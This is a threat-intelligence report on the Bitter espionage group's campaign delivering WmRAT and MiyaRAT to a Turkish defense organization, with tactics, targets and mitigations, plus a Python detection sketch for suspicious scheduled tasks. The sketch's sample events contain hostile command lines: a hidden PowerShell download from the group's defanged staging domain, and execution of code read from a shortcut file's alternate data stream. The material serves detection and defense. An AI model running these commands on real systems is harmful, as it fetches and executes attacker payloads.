Full Report
A suspected South Asian cyber espionage threat group known as Bitter targeted a Turkish defense sector organization in November 2024 to deliver two C++ malware families tracked as WmRAT and MiyaRAT. "The attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to pull down further payloads," Proofpoint
Analysis Summary
# Threat Actor: Bitter (TA397)
## Attribution & Identity
**Attribution:** Suspected South Asian cyber espionage threat group.
**Aliases/Known Groups:** TA397, APT-C-08, APT-Q-37, Hazy Tiger, Orange Yali.
## Activity Summary
Bitter has been active since at least 2013, engaging in cyber espionage, primarily focused on intelligence collection for a supporting South Asian government.
* **November 2024 Campaign:** Targeted a Turkish defense sector organization using social engineering related to public infrastructure projects in Madagascar, delivering WmRAT and MiyaRAT.
* **February 1, 2024:** Targeted an unnamed Chinese government agency via spear-phishing, deploying a trojan for data theft and remote control.
* **Prior Historical Activity:** Targeted entities in China, Pakistan, India, Saudi Arabia, and Bangladesh. Linked to Android malware deployment (PWNDROID2, Dracarys) in 2019 and 2022.
## Tactics, Techniques & Procedures
- Initial Access via spear-phishing utilizing booby-trapped RAR archives.
- **LNK File Delivery:** Used a shortcut (LNK) file within the archive.
- **Evasion/Steganography:** Employed Alternate Data Streams (ADS) in NTFS to conceal PowerShell code within the LNK file.
- **Persistence:** Created a scheduled task on the target machine to pull down further payloads.
- **C2 Communication:** Persistently utilizes scheduled tasks to communicate with staging domains.
- **Capabilities:** Remote access trojan (RAT) functionality including host information collection, file exfiltration/download, screenshot capture, geolocation tracking, and arbitrary command execution (cmd.exe/PowerShell).
- [Implied TTPs for LNK/ADS delivery may align with techniques such as T1204.002, T1547.001, and T1027.]
## Targeting
- **Sectors:** Defense sector, Government agencies.
- **Geography:** Turkey (recent), China, Pakistan, India, Saudi Arabia, Bangladesh.
- **Victims:** A Turkish defense sector organization (Nov 2024); An unnamed Chinese government agency (Feb 2024).
## Tools & Infrastructure
- **Malware Families:** WmRAT, MiyaRAT (reserved for high-value targets), BitterRAT, ArtraDownloader, ZxxZ, PWNDROID2 (Android), Dracarys (Android).
- **Infrastructure (C2/Staging):** joe.jacknwoods[.]com (defanged; a subdomain of jacknwoods[.]com).
- **Lure Material:** Decoy documents discussing public infrastructure projects and a World Bank public initiative in Madagascar.
## Implications
Bitter is a persistent, cross-platform (Windows/Android) espionage group with a sustained focus on intelligence gathering, often targeting government and defense organizations across Asia and the Middle East, and recently extending activity toward Turkey. The use of ADS and scheduled tasks demonstrates a focus on stealthy persistence and maintaining access for long-term intelligence collection and IP theft.
## Mitigations
- Implement network monitoring focused on outbound connections initiated by scheduled tasks, especially when linked to recent file modifications.
- Enhance inspection/scanning of archive file types (RAR) and LNK files for malicious contents or unusual ADS usage.
- Monitor for the execution of PowerShell scripts originating from unexpected file sources or attempting to establish persistence mechanisms.
- Maintain awareness of BEC/social engineering lures related to international infrastructure or development projects.
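The following is an added detection sketch, not part of the original report, that applies the scheduled-task and PowerShell mitigations above to task-creation records matching the TTPs described (interpreter action, download primitive, alternate data stream read, short repeat interval, known staging domain). The record field names and all sample events are constructed assumptions modelled loosely on Windows Security event 4698; only the staging domain comes from the report.

```python
import re

# Staging domain named in the report, kept in the defanged form it was published in.
STAGING_DOMAINS = {"jacknwoods[.]com"}

# Assumed field layout: TaskName, Command (the action's program), Arguments, RepeatInterval (ISO 8601).
INTERPRETER = re.compile(r"(?:^|\\)(?:powershell|pwsh|cmd|mshta|wscript|cscript)(?:\.exe)?$", re.I)
DOWNLOADER = re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|bitsadmin|certutil|curl)\b", re.I)
HIDDEN = re.compile(r"-(?:w|windowstyle)\s+hidden|-e(?:nc|ncodedcommand)?\s", re.I)
ADS_READ = re.compile(r"-stream\s+\S+|\.lnk:[^\s\\]+", re.I)  # PowerShell reading an NTFS alternate data stream
SHORT_REPEAT = re.compile(r"^PT[1-5]?\dM$")                     # repeat interval under one hour, e.g. PT5M


def review_task(event):
    """Return the reasons a task-creation record looks like a staged downloader (empty list if none)."""
    command, args = event.get("Command", ""), event.get("Arguments", "")
    interp = INTERPRETER.search(command) is not None
    reasons = []
    if interp and DOWNLOADER.search(args):
        reasons.append("interpreter action with download primitive")
    if interp and HIDDEN.search(args):
        reasons.append("hidden or encoded PowerShell invocation")
    if interp and ADS_READ.search(args):
        reasons.append("reads an alternate data stream")
    if any(d in (command + " " + args).lower() for d in STAGING_DOMAINS):
        reasons.append("references known staging domain")
    if interp and SHORT_REPEAT.match(event.get("RepeatInterval", "")):
        reasons.append("interpreter re-launched at short interval")
    return reasons


def find_suspicious(events):
    """Map task name -> reasons for every record that trips at least one rule."""
    return {e["TaskName"]: r for e in events if (r := review_task(e))}


SAMPLE_EVENTS = [  # constructed records for illustration, not telemetry from the campaign
    {"TaskName": r"\Microsoft\Windows\Maintenance\WinDiskCheck", "Command": "powershell.exe",
     "Arguments": r'-w hidden -c "iwr http://joe.jacknwoods[.]com/p -OutFile $env:TEMP\a.exe"',
     "RepeatInterval": "PT17M"},
    {"TaskName": r"\Corp\NightlyBackup", "Command": r"C:\Program Files\Backup\backup.exe",
     "Arguments": "--nightly", "RepeatInterval": "P1D"},
    {"TaskName": r"\Corp\TempCleanup", "Command": "powershell.exe",  # benign admin task: no rule fires
     "Arguments": r"-ExecutionPolicy Bypass -File C:\Scripts\Cleanup.ps1", "RepeatInterval": "P1D"},
    {"TaskName": r"\Users\Updater", "Command": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Arguments": r'-c "Get-Content C:\Users\u\Downloads\brief.lnk -Stream s | iex"', "RepeatInterval": "PT5M"},
]

if __name__ == "__main__":
    for name, reasons in find_suspicious(SAMPLE_EVENTS).items():
        print(name, "->", "; ".join(reasons))
```

The rules are deliberately narrow so a routine PowerShell maintenance task with a daily trigger produces no hit; tune the interval and cmdlet lists to your own task baseline.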